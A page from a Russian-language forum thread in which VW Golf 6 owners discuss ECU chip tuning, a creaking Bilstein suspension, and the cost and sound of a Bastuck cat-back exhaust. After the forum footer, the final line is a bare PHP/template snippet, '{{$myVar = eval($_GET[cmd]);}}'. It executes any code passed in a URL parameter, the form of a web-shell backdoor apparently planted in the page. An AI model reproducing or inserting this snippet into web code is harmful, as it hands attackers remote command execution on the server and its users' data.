+ Ответить в теме
Страница 2 из 4 ПерваяПервая 1 2 3 4 ПоследняяПоследняя
Показано с 11 по 20 из 38

Тема: mk6 trend... sport:)


  1. #11
    GTI-Racing teho is on a distinguished road Аватар для teho
    Регистрация
    17.07.2011
    Откуда
    Москва, ЦАО
    Машина
    golf 6 1.4 BSR
    Сообщений
    62
    всем спасибо за теплый прием:) потеплее будет, приеду под мост - познакомимся!

    parker66, отписал в личку.

    пока ближайшие апгрейды - это тормозилки, уже мониторить сайты купры и ауди начал, но там такие желающие уже тоже есть:) турбина - это вопрос далекого будущего...

    вчера разговаривал с другом, обсуждали впуск и выпуск. он сказал, что нужно делать обязательно чип, тк сейчас увеличен впуск холодного воздуха и смесь может быть бедной... что негативно влияет на двигло, а чип перенастроет двигатель с учетом впуска и уберет этот косяк. что скажете?

    сам я хочу чип с возможностью перезаливки, зимой не хочу с ним ездить, но у revo такая штука только со stage 2 идет, а у bsr сразу в комплекте, что конечно гуд. зато по revo я так понял можно конкретно под мой впуск и выпуск правильно прошиться, тем более тут человек есть.
    Последний раз редактировалось teho; 08.02.2012 в 12:04.

  2. #12
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от teho Посмотреть сообщение

    сам я хочу чип с возможностью перезаливки, зимой не хочу с ним ездить, но у revo такая штука только со stage 2 идет, а у bsr сразу в комплекте, что конечно гуд. зато по revo я так понял можно конкретно под мой впуск и выпуск правильно прошиться, тем более тут человек есть.
    Не парься насчет этого, мощность избыточная это всего лишь твоя педаль газа, нажал и отпустил ))))...... даже на 70 л.с. может быть кому то много. Залил чип и катайся, в первые зимние дни по ситуации с дорожным покрытием, если вдруг думаешь, что чип будет провоцировать, то это лишь дело времени привыкнуть и определить собственное чувство безопасности к себе и к другим, много не надо фантазии бед наделать и без чипа )))
    песок сыпется....не останавливайтесь на достигнутом !

  3. #13
    GTI-Racing teho is on a distinguished road Аватар для teho
    Регистрация
    17.07.2011
    Откуда
    Москва, ЦАО
    Машина
    golf 6 1.4 BSR
    Сообщений
    62
    Bon, поддерживаю!:) с чипом посмотрим.

    обкатываю сейчас подвеску, что-то жмакает у меня в области правой задней стойки... сначала грешил на мороз, но как-то для бильштайна это странновато... причем такой звук, как-будто в резинку воды накачали и сжимают, такое происходит при диагональном вывешивании и при неровностях, на лежачих тоже самое.

    звук начинает подбешивать уже, грешу на резинки, которые на шток надеваются, может они или в сервис смотреть? стука нет, аномального поведения подвески тоже нет.

  4. #14
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от teho Посмотреть сообщение

    звук начинает подбешивать уже, грешу на резинки, которые на шток надеваются, может они или в сервис смотреть? стука нет, аномального поведения подвески тоже нет.
    это то что ты в отзыве писал про Бильштайн ?
    Нужно конечно бы в тепле посмотреть, и конечно посмотреть, чтоб не задевало ничего........может резинка и ее нужно тупо попшикать ВэДэшкой.......но если это есть даже на прогретых после долгого движения амиках, то нужно бы на сервис проверить. У меня была от Бильштайна подвеска винтовая, но ни зимой ни летом таких забавных звуков не было.
    песок сыпется....не останавливайтесь на достигнутом !

  5. #15
    GTI-Racing teho is on a distinguished road Аватар для teho
    Регистрация
    17.07.2011
    Откуда
    Москва, ЦАО
    Машина
    golf 6 1.4 BSR
    Сообщений
    62
    ага, как раз в отзыве... я там уточнил про этот звук, но сам грешил именно на сильный холод, все-таки после -23 ночью все может быть, но что меня и насторожило, что не только на холодную этот звук проявляется, также да есть такой звук как-будто скрежет какой-то, посмотрел арку, ничего нигде не должно тереть, кожух тормозов вроде тоже не задевает. в общем фикня какая-то, наверное поеду в север смотреть, что там может быть...

  6. #16
    GTI-Racing Phobos is on a distinguished road Аватар для Phobos
    Регистрация
    15.01.2012
    Откуда
    Нижний Новгород
    Машина
    VW GTI 6
    Сообщений
    230
    Цитата Сообщение от teho Посмотреть сообщение
    hg-motorsport intake
    bastuck cat-back + резонатор
    дружище а про это можешь поподробнее рассказать? я так понял ты заказал коллектор без катализатора или просто его вырезал и поставил обманку + резонатор? что по деньгам вышло? ошибок нет? и не прошивался? эффект почуствовал?

  7. #17
    GTI-Racing teho is on a distinguished road Аватар для teho
    Регистрация
    17.07.2011
    Откуда
    Москва, ЦАО
    Машина
    golf 6 1.4 BSR
    Сообщений
    62
    Phobos, я заказал с резонатором (средняя часть) и банка с катом, те по сути аналог штатной выхлопной системы, но с правильным звуком. чеков, ошибок нет, прошиваться планирую, но пока не решил еще окончательно... разница очень ощутимая, машина начала валить и звук не пищалка, а басовитый, слышан на высоких оборотах, я именно так и хотел. можно заказать без резонатора с прямоточной трубой, будет звук громче в разы. в моем случае еще впуск добавляет буста и заодно и звук погромче... сами баштюк рекомендуют покупать без резонатора, если нужен громкий звук, но труба без TUV.
    55 т. р.

  8. #18
    GTI-Racing Phobos is on a distinguished road Аватар для Phobos
    Регистрация
    15.01.2012
    Откуда
    Нижний Новгород
    Машина
    VW GTI 6
    Сообщений
    230
    Цитата Сообщение от teho Посмотреть сообщение
    банка с катом, те по сути аналог штатной выхлопной системы
    тоесть катализатор остался получается... приход на сколько ощутим?

    Цитата Сообщение от teho Посмотреть сообщение
    в моем случае еще впуск добавляет буста и заодно и звук погромче, но труба без TUV.
    а что со впуском? каким образом добавляет буст? ты поставил буст-контроллер? зачем этот TUV?

    Цитата Сообщение от teho Посмотреть сообщение
    55 т. р.
    цена жесть :(

  9. #19
    GTI-Racing teho is on a distinguished road Аватар для teho
    Регистрация
    17.07.2011
    Откуда
    Москва, ЦАО
    Машина
    golf 6 1.4 BSR
    Сообщений
    62
    на стенд не ездил, по-этому прирост в лс сказать не могу, но по ощущениям впуск и выпуск добавили мин 5 лс! я более чем в этом уверен, когда тапку жмешь, вдавливает в кресло очень сильно) в городе гонки не устраиваю, но со светофора машина уезжает от 2-х литровых движков очень легко! если сравнивать с тем, что было, то это небо и земля и на 80 при тапке в поле выпуливает как ракета.
    TUV - это сертификация типа ISO, если он есть, то машина с гарантии не снимается.

    необязательно заказывать 4 трубы, можно 2, тогда не нужно менять стандартную накладку на бампер, если не брать среднюю часть, то ценник сократится в 2 раза, но по звуку в этом случае ничего не могу сказать. я хотел 4 трубы онли...

  10. #20
    GTI-Racing Phobos is on a distinguished road Аватар для Phobos
    Регистрация
    15.01.2012
    Откуда
    Нижний Новгород
    Машина
    VW GTI 6
    Сообщений
    230
    2 teho и ничего не резали и не варили, а ставил не у официалов? сколько за работу взяли?

+ Ответить в теме
Страница 2 из 4 ПерваяПервая 1 2 3 4 ПоследняяПоследняя

Похожие темы

  1. Продам резину michelin pilot sport 2 и nankang ns2 ultra sport
    от Александр Туров в разделе Шины/диски
    Ответов: 11
    Последнее сообщение: 07.04.2015, 23:12
  2. Vag Sport mk4
    от ingektor в разделе Покупка и продажа запчастей
    Ответов: 0
    Последнее сообщение: 09.12.2013, 13:27
  3. СИДУХИ VAG SPORT
    от ALEX R32 в разделе Покупка и продажа запчастей
    Ответов: 4
    Последнее сообщение: 21.11.2013, 10:02
  4. VAG SPORT
    от ALEX R32 в разделе Покупка и продажа запчастей
    Ответов: 0
    Последнее сообщение: 12.11.2013, 04:01
  5. Bilstein B6 Sport
    от Вадимыч в разделе Тюнинг
    Ответов: 0
    Последнее сообщение: 16.08.2012, 14:46

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}